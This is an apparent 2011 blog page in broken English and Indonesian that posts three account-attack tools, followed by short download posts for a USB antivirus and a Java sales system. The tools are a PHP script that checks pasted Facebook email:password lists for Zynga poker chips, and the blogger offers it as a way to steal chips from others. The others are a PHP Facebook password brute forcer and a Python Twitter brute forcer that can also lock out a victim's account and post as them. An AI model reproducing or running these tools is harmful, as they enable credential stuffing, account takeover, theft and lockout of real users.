Saturday, December 17, 2011

Zynga Poker Chips Checker [HTML]

Are you like play texas holdem poker in facebook game..?

must have occurred to you to steal facebook poker chips from others ..
I give the following program code to check whether or not a lot of poker chips facebook account ...

<html>
<head><title>-  Facebook Texas HoldEm Poker Check -</title>
<style type="text/css">
body{
    background-color: #000;
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
    scrollbar-face-color: #FFFFFF;
    scrollbar-highlight-color: #000000;
    scrollbar-shadow-color: #000000;
    scrollbar-3dlight-color: #FFFFFF;
    scrollbar-arrow-color: #FFFFFF;
    scrollbar-track-color: #FFFFFF;
    scrollbar-darkshadow-color: #FFFFFF;
}
input,textarea{
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
    background-color: #999999;
    border:1px solid #000000;
}
</style>
</head>
<body>
<h2><img  src="http://photos-e.ak.fbcdn.net/photos-ak-sf2p/v27562/52/2389801228/app_1_2389801228_4018.gif"  width="50px"> Facebook Texas HoldEm Poker Check</h2>
<form name="data" method="post">
<textarea name="logins" class="input" cols="50"  rows="10"></textarea><br><h4>Copypaste &copy;  2010 by gblack & slay3rz</h4><br>
<input type="submit" value="Check!">
</form>
<?php
error_reporting(0);
set_time_limit(0);
if(isset($_POST['logins'])){
    $logins = trim($_POST['logins']);
    flush(); ob_flush();
    $logins = split("\n", $logins);
    $jum =  count($logins);
    flush(); ob_flush();
    print "<hr><b>Checking ".$jum." Facebook logins now...<br>Please wait...</b><br>";
    flush(); ob_flush();
    for($x = 0; $x < $jum; $x++) {
        $logins = str_replace(" ", "", $logins);
        $logins = str_replace("\r", "", $logins);
        $logins = str_replace("\n", "", $logins);
        list($email, $password) = split(":", $logins[$x]);
        $num = $x + 1;
        print "<br>[".$num."] ".$email.":".$password." - ";
        flush(); ob_flush();
        if(file_exists("fb_cookies.txt")) {
            unlink("fb_cookies.txt");
        }
        $jembut = CekPoker($email, $password);
        print $jembut;
    }
    print "<hr><b>Done!</b>";
    
}
function CekPoker($email,$passw) {
    $uas = array(1 => "Mozilla/5.0 (Windows; U; Windows NT 6.1;  en-US; rv:1.9.0.16) Gecko/2010010414 Firefox/3.0.16 Flock/2.5.6",
                2 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)  AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4  Safari/531.21.10",
                3 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US;  rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6",
                4 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",
                5 => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT  6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET  CLR 3.0.30729; Media Center PC 6.0)");
    $ua = rand(1, count($uas));
    $ua = $uas[$ua];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,  "http://www.facebook.com/login.php?api_key=965dc598471b823e0da74090bfe054bc   &v=1.0&next=http%3A%2F%2Ffacebook.poker.zynga.com%   2Fpoker%2F&canvas=1");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_ENCODING, "");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "poker.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, $ua);
    $chEx = curl_exec($ch);
        curl_close($ch);
        $chr = substr($chEx, strpos($chEx, "name=\"charset_test\""));
        $chr = substr($chr, strpos($chr, "value=") + 7);
        $chr = substr($chr, 0, strpos($chr, "\""));
        $api = substr($chEx, strpos($chEx, "name=\"api_key\""));
        $api = substr($api, strpos($api, "value=") + 7);
        $api = substr($api, 0, strpos($api, "\""));
        $loc = substr($chEx, strpos($chEx, "name=\"locale\""));
        $loc = substr($loc, strpos($loc, "value=") + 7);
        $loc = substr($loc, 0, strpos($loc, "\""));
        $lsd = substr($chEx, strpos($chEx, "name=\"lsd\""));
        $lsd = substr($lsd, strpos($lsd, "value=") + 7);
        $lsd = substr($lsd, 0, strpos($lsd, "\""));
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,  "http://www.facebook.com/login.php?api_key=965dc598471b823e0da74090bfe054bc   &v=1.0&next=http%3A%2F%2Ffacebook.poker.zynga.com%   2Fpoker%2F&canvas=1");
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_POSTFIELDS,  "api_key=".$api."&locale=".$loc."&non_com_login=&e   mail=".$email."&pass=".$passw."&charset_test=".$ch   r."&lsd=".$lsd);
        curl_setopt($ch, CURLOPT_ENCODING, "");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "poker.txt");
        curl_setopt($ch, CURLOPT_COOKIEJAR, "poker.txt");
        curl_setopt($ch, CURLOPT_USERAGENT, $ua);
        $chEx = curl_exec($ch);
        curl_close($ch);
        
         if(preg_match("/http:\/\/photos-e.ak.fbcdn.net\/photos-ak-sf2p\/v27562\/52\/2389801228\/app_1_2389801228_4018.gif/",  $chEx)) {
            print "Not playing Texas Hold'Em Poker!";
        } elseif(preg_match("/Please review recent activity/", $chEx)) {
            print "Security check needed!";
        } elseif(preg_match("/Incorrect Email/", $chEx)) {
            print "Wrong password!";
        } elseif(preg_match("/<html><head><title>Redirecting.../", $chEx)) {
            $token = preg_match("/auth_token=(.*)\"/", $chEx, $tokenz);
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, "http://apps.facebook.com/texas_holdem/?auth_token=".$token);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_ENCODING, "");
            curl_setopt($ch, CURLOPT_COOKIEJAR, "poker.txt");
            curl_setopt($ch, CURLOPT_USERAGENT, $ua);
            $chEx = curl_exec($ch);
            curl_close($ch);
            if(preg_match("/PokerLadder(.*).swf/", $chEx)) {
                if(preg_match("/__current_chips = (.*)\;/i", $chEx, $chips)) {
                    $chipz = preg_split("/;/", $chips[1]);
                    $chipz = $chipz[0];
                    if($chipz > 1000000000) {
                        $chipz = round(($chipz/1000000000),2)." B";
                        number_format($chipz);
                    } elseif ($chipz > 1000000) {
                        $chipz = round(($chipz/1000000),2)." M";
                        number_format($chipz);
                    } elseif ($chipz > 1000) {
                        $chipz = round(($chipz/1000),2)." K";
                        number_format($chipz);
                    } elseif ($chipz < 100) {
                        $chipz = "Asu! Kere iki bocah!";
                    } else {
                        $chipz = "Asu! Kere iki bocah!";
                    }
                    print $chipz;
                } else {
                    print "Asu! Error cok!";
                }
            }
        } elseif(preg_match("/Please re-enter your password/", $chEx)) {
            print "Please re-enter your password!";
        } elseif(preg_match("/PokerLadder(.*).swf/", $chEx)) {
            if(preg_match("/__current_chips = (.*)\;/i", $chEx, $chips)) {
                $chipz = preg_split("/;/", $chips[1]);
                $chipz = $chipz[0];
                if($chipz > 1000000000) {
                    $chipz = round(($chipz/1000000000),2)." B";
                    number_format($chipz);
                } elseif ($chipz > 1000000) {
                    $chipz = round(($chipz/1000000),2)." M";
                    number_format($chipz);
                } elseif ($chipz > 1000) {
                    $chipz = round(($chipz/1000),2)." K";
                    number_format($chipz);
                } elseif ($chipz < 100) {
                    $chipz = "Asu! Kere iki bocah!";
                } else {
                    $chipz = "Asu! Kere iki bocah!";
                }
                print $chipz;
            }
        }  elseif(preg_match("/Your account has a high number of invalid login attempts./", $chEx)) {
            print "Damn, captcha enabled!";
        } elseif (preg_match("/Please answer a few security questions/", $chEx)) {
            print "Please answer a few security questions";
        } else {
            print "Unkn0wn response...";
            //print_r($chEx);
        }
    }
?>



ok. so first source code
  to opt out next sorce code ..?
meal please bookmark this blog
»»  read more

Facebook Brute Force Code [PHP]

hello friends met again congratulations
I do not have long to post sorce code in because of busy with thejob ...
following I will provide source code Facebook Brute Force using PHP programming language ...

The following code below ...

<?  
 ################################  
 # Face Book Brute Forcer  
 ################################   
set_time_limit(0);   $username ="brute@force.org"; // username to brute force   $dictionary ="dictionary.txt"; // need dictionary to password list      function kontrol($kullaniciadi,$sifre){   $useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";   $data = "email=$kullaniciadi&pass=$sifre&login=Login" ;   $ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');   curl_setopt($ch, CURLOPT_HEADER, 0);   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   curl_setopt($ch, CURLOPT_POST, 1);   curl_setopt($ch, CURLOPT_POSTFIELDS, $data);   curl_setopt($ch, CURLOPT_USERAGENT, $useragent);   curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');   curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');   $source=curl_exec ($ch);   curl_close ($ch);   if(eregi("Home</title>",$source)){return true;} else {return false;}      }      if(!is_file($dictionary)){echo "$dictionary is not file";exit;}   $lines=file($dictionary);   echo "Attack Starting..<br>";   sleep(10);   echo "Attack Started, brute forcing..<br>";   foreach($lines as $line){   $line=str_replace("\r","",$line);   $line=str_replace("\n","",$line);   if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P   assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}   else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :    $line</font><br>";}   }  
 ?>


 ok. so first source code
  to opt out next sorce code ..?
meal please bookmark this blog
http://gempas-xp.blogspot.com
»»  read more

Twitter Brute Force Source Code[Py]


hello friends met again congratulations
I do not have long to post sorce code in because of busy with thejob ...
following I will provide source code Twiter Brute Force usingpython programming language ...


The following code below ...


#!/usr/bin/python
# Toolname   : twitteater.py
# Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
# my forum   : www.devilzc0de.org/forum
# Version    : v1.0
# This was written for educational purpose only. 
# Use this at your own risk.
# Author will be not responsible for any damage !
# I'm preffer using curl on system than using pycurl

import sys, time, StringIO, commands, re, os, random 

# Define variable
__programmer__ = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__    = "1.0"
twittbird    = '''
   +++                    ++++  ++++       +++
  +++++                                 ++++  ++++        +++++
  +++++                                  ++   ++++        +++++
  ++++++++++++++  ++       ++      ++         ++++        +++++           ++++         ++++++
  ++++++++++++++ ++++     ++++    ++++  ++++  +++++++++++ +++++++++++  +++++++++++    ++++++++++
  +++++          ++++     ++++    ++++  ++++  +++++++++++ +++++++++++  +++++   +++++  ++++++++++
  +++++          ++++     ++++    ++++  ++++  ++++++++++  +++++++++    +++++++++++++ +++++
  +++++          ++++    ++++++   ++++  ++++  +++++       +++++        +++++++++++++ ++++
   ++++++++++++  ++++++ +++++++  +++++  ++++   +++++++++   +++++++++   ++++          ++++
    ++++++++++++  +++++++++++++++++++   ++++    +++++++++   ++++++++   +++++++++++   ++++
     ++++++++++     +++++++  ++++++     ++++     ++++++++    +++++++     ++++++++    ++++
     "The bird has been eaten by python snake..."
     
     Programmer : %s
     Version    : %s
     Twitter bruteforcer & freezer
''' % (__programmer__, __version__)

option           = '''
Usage  : %s [options]
Option : -u, --username      <username>      |   User for bruteforcing
         -w, --wordlist      <filename>      |   Wordlist used for bruteforcing
     -s, --singlepass    <password>      |   Use single password (for update status only) 
     -d, --updatestatus     <text>        |   Post new status at given username        
         -v, --verbose                |   Set %s will be verbose
         -p, --proxy         <host:port>    |   Set proxy will be use
         -t, --timeout         <number>    |   Set %s timeout request time (default : 15)
         -r, --refferer      <url>        |   Set %s refferer will be use (default : random)
         -f, --freeze                |   freeze user, user will be unable login for any minute
         -l, --log         <filename>    |   Specify output filename (default : twitteater.log)
         -h, --help          <help>          |   Print this help
                                                            
Example : 
     - bruteforcing mode  ~> %s -u brad@hackme.com -w wordlist.txt 
     - freeze mode          ~> %s -u brad@hackme.com -f
     - update status mode ~> %s -u brad@hackme.com -s hackmeifyoucan -d "Beware of Programmers who carry screwdrivers. -- Leonard Brandwein"
       
P.S : add "&" to run in the background  
''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0])

hme = '''
Usage : %s [option]
    -h or --help for get help''' % sys.argv[0]

refferer     = ['http://twitter.com/',
        'http://twitter.com/login',
        'http://twitter.com/about/contact',
        'http://blog.twitter.com/',
        'http://status.twitter.com/',
        'http://twitter.com/about',
        'http://twitter.com/about'
           ]

ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
        'amaya/9.51 libwww/5.4.0',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
        ]
freeze = False
upstat = False
brute = False
counter = 1
# warn , twitter will lock username after 17 x login attempt (tested)
maxlock = 18
verbocity = ''
proxy     = ''
background = ''
timeout      = '15'
statsurl  = 'http://twitter.com/statuses/update.xml'
credential = 'http://twitter.com/account/verify_credentials.xml'
green     = '\033[38m'
red     = '\033[31m'
reset     = '\033[0;0m'
log = "twitteater.log"
file = open(log, "a")

def helpme():
    print twittbird
    print option
    file.write(twittbird)
    file.write(option)
    sys.exit(1)
    
def helpmee():
    print twittbird
    print hme
    file.write(twittbird)
    file.write(hme)
    sys.exit(1)
        
for arg in sys.argv:
    if arg.lower() == '-u' or arg.lower() == '--user':
                username = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                brute = True
        elif arg.lower() == '-f' or arg.lower() == '--freeze':
                freeze = True
        elif arg.lower() == '-d' or arg.lower() == '--updatestatus':
            newstatus = sys.argv[int(sys.argv[1:].index(arg))+2]
            newstatus = newstatus.replace("_"," ")
                upstat = True
        elif arg.lower() == '-t' or arg.lower() == '--timeout':
                timeout = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-s' or arg.lower() == '--singlepass':
                password = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-r' or arg.lower() == '--refferer':
                refferer = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-p' or arg.lower() == '--proxy':
                proxy = '-x '+sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-v' or arg.lower() == '--verbose':
            verbocity = "-v"
        elif arg.lower() == '-l' or arg.lower() == '--log':
            log = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-h' or arg.lower() == '--help':
            helpme()
    elif len(sys.argv) <= 1:
        helpmee()

def updatestatus():
    
    trytwitter = 'curl -u %s:%s %s -d status=\"%s\" %s --connect-timeout %d -A \"%s\" %s' % (username, password, statsurl, newstatus, verbocity, int(timeout), random.choice(ouruseragent), proxy)
    restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
    updated = re.findall("<user>", restwitter)
    duplicate = re.findall("Status is a duplicate.", restwitter)
    if verbocity == "-v":
        print restwitter
    if duplicate:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Duplicate status found\"")
        print "[*] Duplicate status is not accepted by twitter, please don't reduplicate it\n"
        file.write("\n[*] Duplicate status is not accepted by twitter, please don't reduplicate it!\n\n")
        sys.exit(1)
    if updated:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status successfully\"")
        print "[*] Update status : %s%s%s has been posted successfully ! \n" % (red, newstatus, reset)
        file.write("\n[*] Update status : %s has been posted successfully !\n\n" % (newstatus))
        sys.exit(1)
    else:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status failed\"")
        print "[*] password is wrong ! \n" 
        file.write("\n[*] password is wrong !\n\n")
        sys.exit(1)

def freezemode():
    global counter
    if freeze:
        print "[*] Trying to freeze account %s%s%s, user will be unable login for hour(s)" % (red, username, reset)
        file.write("\n[*] Trying to freeze account %s, user will be unable login for hour(s)" % (username))
        try:
            while counter <= maxlock:
                sys.stdout.write("\r[*] %s%d%s try has gived...                          " % (red, int(counter), reset))
                sys.stdout.flush()
                trytwitter = 'curl -u %s:freeze %s %s --connect-timeout %d' % (username, credential, verbocity, int(timeout))
                restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
                locked = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
                if locked:
                    os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account successfully freeze\"")
                    print "\n[*] Acount freeze %s%s%s succeded, and unable for login for %d seconds !" % (red, username, reset, int(locked[0]))
                    file.write("\n[*] Acount freeze %s succeded, and unable for login for %d seconds !\n\n" % (username, int(locked[0])))
                    sys.exit(1)
                if verbocity == "-v":
                    print restwitter
                counter = int(counter) + 1
        except KeyboardInterrupt:
            print "\n[-] Deactivated freezing mode\n"
            file.write("\n[-] Deactivated freezing mode\n")
            sys.exit(1)
        
def twitteater(word):
    global counter
    sys.stdout.write("\r[*] Trying %s is %s%d%s of %s%d%s                                  " % (word, red, int(counter), reset, red, len(words), reset))
    sys.stdout.flush()
    file.write("\n[*] Trying %s is %d of %d                                                \n" % (word, int(counter), len(words)))
         try:
        trytwitter = 'curl -u %s:%s %s -A "%s" %s -e %s --connect-timeout %d %s' % (username, word, credential, random.choice(ouruseragent), verbocity, random.choice(refferer), int(timeout), proxy)
        restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
        partwitter = re.findall("<user>", restwitter)
        sick = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
        if sick:
            print "\n[*] Account %s%s%s has been freeze by twitter" % (red, username, reset)
            file.write("\n[*] Account %s has been freeze by twitter" % (username))
            os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account has been freeze\"")
            sleeper = 0
            while sleeper <= int(sick[0]):
                sys.stdout.write("\r[*] Waiting %d second(s) for start bruteforcing again...           " % (int(sick[0])))
                sys.stdout.flush()
                sleeper = int(sleeper) + 1
                sick[0] = int(sick[0]) - 1
                time.sleep(1)
        if partwitter:
            print "\n[*] Account has been login successfully !"
            print "[*] Username : %s%s%s" % (red, username, reset)
            print "[*] Password : %s%s%s" % (red, word, reset)
            file.write("\n[*] Account has been login successfully !\n")
            file.write("[*] Username : %s\n" % (username))
            file.write("[*] Password : %s\n\n" % (word))
            os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"login successfull !\"")
            sys.exit(1)
        if verbocity == "-v":
            print restwitter
    except KeyboardInterrupt:
        print "\n[-] Deactivated bruteforcing mode...\n"
        file.write("\n[-] Deactivated bruteforcing mode...\n")
        sys.exit(1)
    counter = int(counter) + 1
          
def bruteforcemode():
    global word        
    for word in words:
        twitteater(word.replace("\n",""))    

def main():
    global words
    print twittbird
    file.write(twittbird)
    print "[*] Starting attack at %s" % time.strftime("%X")
    file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
    if freeze:
        print "[*] %sFreeze%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] Freeze mode activated")
    elif brute:
        print "[*] %sBruteforce%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] bruteforce mode activated")
    elif upstat:
        print "[*] %sUpdate status%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] Update status mode activated")
    print "[*] Using PID : %s%s%s \n" % (red, os.getpid(), reset)
    file.write("\n[*] Using PID : %s \n" % (os.getpid()))
    if freeze:
        freezemode()
    if upstat:
        updatestatus()
    if brute:     
        try:
            preventstrokes = open(wordlist, "r")
            words            = preventstrokes.readlines()
            count          = 0 
            while count < len(words): 
                words[count] = words[count].strip() 
                count += 1 
        except(IOError): 
              print "\n[-] Error: Check your wordlist path\n"
            file.write("\n[-] Error: Check your wordlist path\n")
              sys.exit(1)
        bruteforcemode()
        twitteater(word)

    
if __name__ == '__main__':
    main()


ok. so first source code
  to opt out next sorce code ..?
meal please bookmark this blog
»»  read more

Wednesday, November 30, 2011

MX One Antivirus 4

MX One Antivirus 4 :


aplikasi antivirus Gratis terbaru 2011 yang dapat digunakan pada FlashDisk dan dirancang untuk melindungi perangkat penyimpanan removable seperti

USB stick ( juga dikenal sebagai pendrives )
iPod
memoirs M2
SD, dan microSD.

MX One Antivirus dapat menghilangkan Virus, Trojans, Worms, Spyware (Spyware),
Hacking Tools (Hacktools),
Software Risk (Riskware).

MX One juga Kompatibel dengan antivirus lainnya seperti
NOD32,
Kaspersky,
BitDefender.
dan lain-lain.

Dengan digunakannya System “CHECK AND DESTROY” MX One dapat mendeteksi dan menghapus semua virus yang tidak diketahui yang mencoba untuk menginfeksi perangkat Anda saat terhubung ke PC yang terinfeksi.

Download File Here ..!!
»»  read more

SI Penjualan Depot Air minum [Java Source]


Depot Air minum [Java Source]

Modul-modulnya :
- Data Barang
- Data Pelanggan
- Transaksi Penjualan
- Laporan Barang,Pelanggan,Kupon,pertanggal,bulanan,tahunan

Download File Here ..!!
»»  read more